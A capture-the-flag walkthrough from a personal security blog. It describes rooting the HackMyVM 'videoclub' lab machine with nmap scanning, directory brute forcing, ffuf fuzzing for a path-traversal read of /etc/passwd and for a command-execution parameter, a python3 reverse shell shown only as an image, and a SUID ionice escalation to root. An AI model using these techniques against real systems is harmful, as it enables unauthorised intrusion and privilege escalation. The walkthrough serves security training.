Muzec's Cyber Security Blog

Hack. Sleep. Repeat

View on GitHub

Scanning With Nmap

We always start with an nmap scan…..

Nmap -sC -sV -p- -oA nmap <Target-IP>

# Nmap 7.91 scan initiated Sat Oct  2 16:07:21 2021 as: nmap -sC -sV -p- -oA nmap 172.16.139.237
Nmap scan report for 172.16.139.237
Host is up (0.00020s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 96:9f:0e:b8:03:40:88:96:8b:b1:bf:58:ac:ff:d5:3a (RSA)
|   256 f2:38:ff:38:44:1b:7a:5d:3d:0c:bb:cd:c3:93:55:45 (ECDSA)
|_  256 35:c2:e8:90:61:0d:19:7b:01:f0:b5:2a:d1:c6:27:ad (ED25519)
3377/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: MARGARITA VIDEO-CLUB
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Oct  2 16:07:35 2021 -- 1 IP address (1 host up) scanned in 14.37 seconds

We have HTTP port running on a different port seems cool i guess let start our enumeration already.

image

A smooth video club web-page let check the source page for some hint.

image

Not that userfull to us let burst some directory.

image

With dirbuster got some directory just some normal ones like robots.txt and videos let check the robots.txt first.

image

We found a secret txt directory let confirm it.

image

Seems cool and Happy Birthday to HackMyVm Btw now back to our file seems like a usernames or passwords maybe a list to brute force directory am not to sure but going through the list found some words interesting.

image

Putting it together exiftool and steghide seems crazy i know right lol so i decided to check all the metadata of all the images and videos on the website.

image

image

With time i was able to put up a list now let brute force directory with the new lists created.

image

Interesting seems the php directory seems empty if you are thinking what am thinking let brute force for parameter.

┌──(muzec㉿Muzec-Security)-[~/Documents/HackMyVm/videoclub]
└─$ ffuf -c -ic -r -u 'http://172.16.139.237:3377/c0ntr0l.php?FUZZ=../../../../../../../../../../../../../../etc/passwd' -w list.txt -fs 0

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://172.16.139.237:3377/c0ntr0l.php?FUZZ=../../../../../../../../../../../../../../etc/passwd
 :: Wordlist         : FUZZ: list.txt
 :: Follow redirects : true
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
 :: Filter           : Response size: 0
________________________________________________

:: Progress: [48/48] :: Job [1/1] :: 14 req/sec :: Duration: [0:00:04] :: Errors: 0 ::
                                                                                                                                                                       
┌──(muzec㉿Muzec-Security)-[~/Documents/HackMyVm/videoclub]

LFI parameter brute forcing i got nothing now let try for CMD .

┌──(muzec㉿Muzec-Security)-[~/Documents/HackMyVm/videoclub]
└─$ ffuf -c -ic -r -u 'http://172.16.139.237:3377/c0ntr0l.php?FUZZ=id' -w list.txt -fs 0

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://172.16.139.237:3377/c0ntr0l.php?FUZZ=id
 :: Wordlist         : FUZZ: list.txt
 :: Follow redirects : true
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
 :: Filter           : Response size: 0
________________________________________________

f1ynn                   [Status: 200, Size: 54, Words: 3, Lines: 2]
:: Progress: [47/47] :: Job [1/1] :: 45 req/sec :: Duration: [0:00:03] :: Errors: 0 ::

Boom we got the parameter and we have RCE.

image

Now let get shell back to our terminal.

image

I use python3 one liner reverse shell payload checking back to my listener and we have shell.

image

Spawn a tty shell and we are cool.

image

Going to the home directory of user librarian we have the user.txt flag now time to get root.

Privilege Escalation

find / -perm -u=s -type f 2>/dev/null

image

Enumerating for SUID and i found /home/librarian/ionice now let check gtfobins for exploit.

image

Command to get root /home/librarian/ionice /bin/sh -p

image

Finding the root.txt flag find / -name root.txt 2>/dev/null .

image

And we are done box rooted.

Greeting From Muzec



Back To Home